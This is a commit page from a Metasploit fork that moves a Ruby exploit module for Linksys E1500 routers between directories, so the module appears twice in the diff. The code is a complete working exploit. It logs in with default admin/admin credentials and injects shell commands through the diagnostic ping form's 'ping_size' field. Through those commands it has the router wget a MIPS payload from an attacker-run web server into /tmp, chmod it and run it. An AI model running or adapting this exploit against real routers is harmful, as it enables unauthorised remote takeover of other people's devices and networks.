adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

make msftidy happy

Browse Source
This commit is contained in:
m-1-k-3
2013-03-27 17:46:02 +01:00
parent e042fd3697
commit dfd451f875
2 changed files with 192 additions and 196 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/linux/http/linksys_e1500_up_exec.rb
+192
View File
@@ -0,0 +1,192 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys E1500 Command Execution - Upload and Execute',
'Description' => %q{
This module can be used to execute a payload on Linksys Routers
},
'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '57760' ],
[ 'EDB', '24475' ],
[ 'OSVDB', '89912' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
],
'DisclosureDate' => 'Feb 05 2013',
'Privileged' => true,
'Platform' => [ 'linux' ],
'Arch' => ARCH_MIPSLE,
'Targets' => [[ 'Automatic', { }]],
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
},
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(80),
OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('DOWNHOST', [ false, 'The host to request the MIPS payload from' ]),
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)', nil ]),
OptString.new('SRVHOST', [ true, 'The local host to listen on. This must be an address on the local machine' ]),
], self.class)
end
#MISSING - command execution payload
def request(cmd,user,pass,uri)
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'authorization' => basic_auth(user,pass),
'vars_post' => {
"submit_button" => "Diagnostics",
"change_action" => "gozila_cgi",
"submit_type" => "start_ping",
"action" => "",
"commit" => "0",
"ping_ip" => "1.1.1.1",
"ping_size" => "&#{cmd}&",
"ping_times" => "5",
"traceroute_ip" => ""
}
})
if (! res)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload [No Response]")
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
end
def exploit
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
uri = '/apply.cgi'
user = datastore['USERNAME']
pass = datastore['PASSWORD']
rhost = datastore['RHOST']
rport = datastore['RPORT']
# We must regenerate the payload-> not sure if this is the right way
arch = "ARCH_MIPSLE"
plat = "linux"
p = exploit_regenerate_payload(plat, arch)
@pl = p.encoded_exe
#
# start our server
#
resource_uri = '/' + downfile
service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
if (datastore['DOWNHOST'])
service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
end
#
# testing Login
#
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'authorization' => basic_auth(user,pass)
})
return if res.nil?
return if (res.code == 404)
if [200, 301, 302].include?(res.code)
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
else
print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
return
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
#this filename is used to store the payload on the device
filename = rand_text_alpha_lower(8)
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
request(cmd,user,pass,uri)
#
# chmod
#
cmd = "chmod 777 /tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
request(cmd,user,pass,uri)
#
# execute
#
cmd = "/tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
request(cmd,user,pass,uri)
handler
end
# # Handle incoming requests from the server
def on_request_uri(cli, request)
#print_status("on_request_uri called: #{request.inspect}")
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
send_response(cli, @pl)
end
end
modules/exploits/multi/http/linksys_e1500_up_exec.rb
-196
View File
@@ -1,196 +0,0 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys E1500 Command Execution - Upload and Execute',
'Description' => %q{
This module can be used to execute a payload on Linksys Routers
},
'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'BID', '57760' ],
[ 'EDB', '24475' ],
[ 'OSVDB', '89912' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
],
'DisclosureDate' => 'Feb 05 2013',
'Privileged' => true,
'Platform' => [ 'linux' ],
'Arch' => ARCH_MIPSLE,
'Targets' => [[ 'Automatic', { }]],
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
},
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(80),
OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('DOWNHOST', [ false, 'The host to request the MIPS payload from' ]),
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)', nil ]),
OptString.new('SRVHOST', [ true, 'The local host to listen on. This must be an address on the local machine' ]),
], self.class)
end
def request(cmd,user,pass,uri)
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'authorization' => basic_auth(user,pass),
'encode_params' => true,
'vars_post' => {
"submit_button" => "Diagnostics",
"change_action" => "gozila_cgi",
"submit_type" => "start_ping",
"action" => "",
"commit" => "0",
"ping_ip" => "1.1.1.1",
"ping_size" => "&#{cmd}&",
"ping_times" => "5",
"traceroute_ip" => ""
}
})
if (! res)
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload [No Response]")
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
end
def exploit
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
uri = '/apply.cgi'
user = datastore['USERNAME']
pass = datastore['PASSWORD']
rhost = datastore['RHOST']
rport = datastore['RPORT']
# We must regenerate the payload-> not sure if this is the right way
arch = "ARCH_MIPSLE"
plat = "linux"
p = exploit_regenerate_payload(plat, arch)
@pl = p.encoded_exe
#
# start our server
#
resource_uri = '/' + downfile
service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
if (datastore['DOWNHOST'])
service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
end
#
# testing Login
#
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'authorization' => basic_auth(user,pass)
})
return if res.nil?
return if (res.code == 404)
if [200, 301, 302].include?(res.code)
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
else
print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
return
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
#this filename is used to store the payload on the device
filename = rand_text_alpha_lower(8)
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
request(cmd,user,pass,uri)
#
# chmod
#
cmd = "chmod 777 /tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
request(cmd,user,pass,uri)
#
# execute
#
cmd = "/tmp/#{filename}"
print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
request(cmd,user,pass,uri)
handler
end
# # Handle incoming requests from the server
def on_request_uri(cli, request)
#print_status("on_request_uri called: #{request.inspect}")
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
send_response(cli, @pl)
end
end